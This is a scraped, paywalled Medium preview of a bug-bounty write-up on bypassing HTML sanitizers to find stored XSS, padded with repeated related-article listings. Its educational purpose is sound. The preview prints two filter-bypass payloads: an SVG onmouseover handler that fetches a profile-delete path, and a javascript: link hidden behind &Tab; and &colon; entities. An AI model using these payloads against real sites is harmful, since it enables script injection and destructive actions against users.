Member-only story

$100-$20k worth Stored XSS Vulnerability | Hidden Methods

It4chis3c

Published in

InfoSec Write-ups

4 min readFeb 26, 2025

Hidden Methods to bypass restriction to find Stored XSS in Bug Bounties

Friend Link | Free Link

Hi geeks, it4chis3c (Twitter) came-up with another bounty earning write-up in the Bug Bounty Hunting Series:

It4chis3c

Bug Bounty Hunting Series

View list

30 stories

Bypassing HTML Sanitizers Like a Pro

Stripped `<script>` Tags? Use `<svg>` + `onload`

<!-- Most WAFs miss SVG event handlers -->
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="red" onmouseover="fetch('/profile/delete')"/>
</svg>

Sanitizers often allow SVG for graphics but forget to validate event handlers like onmouseover.

Blocked `javascript:`? Use `&colon;` Trick

<!-- Bypass colon filters in href/src -->
<a href="java&Tab;script&colon;alert(1)">Click Me (Works in Chrome)</a>

Real-World Example: A CMS allowed &Tab; (URL-encoded tab) and &colon; (HTML entity…

$100-$20k worth Stored XSS Vulnerability | Hidden Methods

Bug Bounty Hunting Series

Bypassing HTML Sanitizers Like a Pro

Stripped `<script>` Tags? Use `<svg>` + `onload`

Blocked `javascript:`? Use `&colon;` Trick

Create an account to read the full story.

Published in InfoSec Write-ups

Written by It4chis3c

Responses (2)

More from It4chis3c and InfoSec Write-ups

$100-$200 worth 403 Bypass Techniques

Practical, Advanced and Real-world based Techniques to Bypass 403 Forbidden

S3 Bucket Recon: Finding Exposed AWS Buckets Like a Pro!

From Discovery to Exploitation: A Complete Guide to S3 Bucket Recon

Unlock the Full Potential of the Wayback Machine for Bug Bounty

Turn Archives into $Bounties$

$100-$5000 worth File Upload Vulnerability | Advanced Techniques

Hidden and Advanced Techniques to bypass File Upload Restrictions

Recommended from Medium

Bypassing HackerOne 2FA due to race condition.

I hope you all are doing well :)

How I Earned $9,750 in 48 Hours by Finding a Critical Security Flaw

The step-by-step story of how I uncovered a critical vulnerability, reported it and landed a $9,750 bounty — fast

Lists

Medium's Huge List of Publications Accepting Submissions

Hijacking Sessions with IDOR and XSS— @bxmbn

Picture a platform designed to handle sensitive documentation — think insurance claims or identity verification — turning into a goldmine…

$50–$200 Low Hanging Bugs/Fruit Automation | Bug Automation Part 1

Practical Techniques, Tips and Tricks to Find Low Hanging Bugs

Autorize & IDOR: How a Simple Token Swap Exposed Sensitive Data

About Me

20 Simple Bug Bounty Automation Techniques

How to Automate Bug Hunting and Improve Efficiency in Bug Bounty Programs

$100-$20k worth Stored XSS Vulnerability | Hidden Methods

Bug Bounty Hunting Series

Bypassing HTML Sanitizers Like a Pro

Stripped <script> Tags? Use <svg> + onload

Blocked javascript:? Use &colon; Trick

Create an account to read the full story.

Published in InfoSec Write-ups

Written by It4chis3c

Responses (2)

More from It4chis3c and InfoSec Write-ups

$100-$200 worth 403 Bypass Techniques

Practical, Advanced and Real-world based Techniques to Bypass 403 Forbidden

S3 Bucket Recon: Finding Exposed AWS Buckets Like a Pro!

From Discovery to Exploitation: A Complete Guide to S3 Bucket Recon

Unlock the Full Potential of the Wayback Machine for Bug Bounty

Turn Archives into $Bounties$

$100-$5000 worth File Upload Vulnerability | Advanced Techniques

Hidden and Advanced Techniques to bypass File Upload Restrictions

Recommended from Medium

Bypassing HackerOne 2FA due to race condition.

I hope you all are doing well :)

How I Earned $9,750 in 48 Hours by Finding a Critical Security Flaw

The step-by-step story of how I uncovered a critical vulnerability, reported it and landed a $9,750 bounty — fast

Lists

Medium's Huge List of Publications Accepting Submissions

Hijacking Sessions with IDOR and XSS— @bxmbn

Picture a platform designed to handle sensitive documentation — think insurance claims or identity verification — turning into a goldmine…

$50–$200 Low Hanging Bugs/Fruit Automation | Bug Automation Part 1

Practical Techniques, Tips and Tricks to Find Low Hanging Bugs

Autorize & IDOR: How a Simple Token Swap Exposed Sensitive Data

About Me

20 Simple Bug Bounty Automation Techniques

How to Automate Bug Hunting and Improve Efficiency in Bug Bounty Programs

Stripped `<script>` Tags? Use `<svg>` + `onload`

Blocked `javascript:`? Use `&colon;` Trick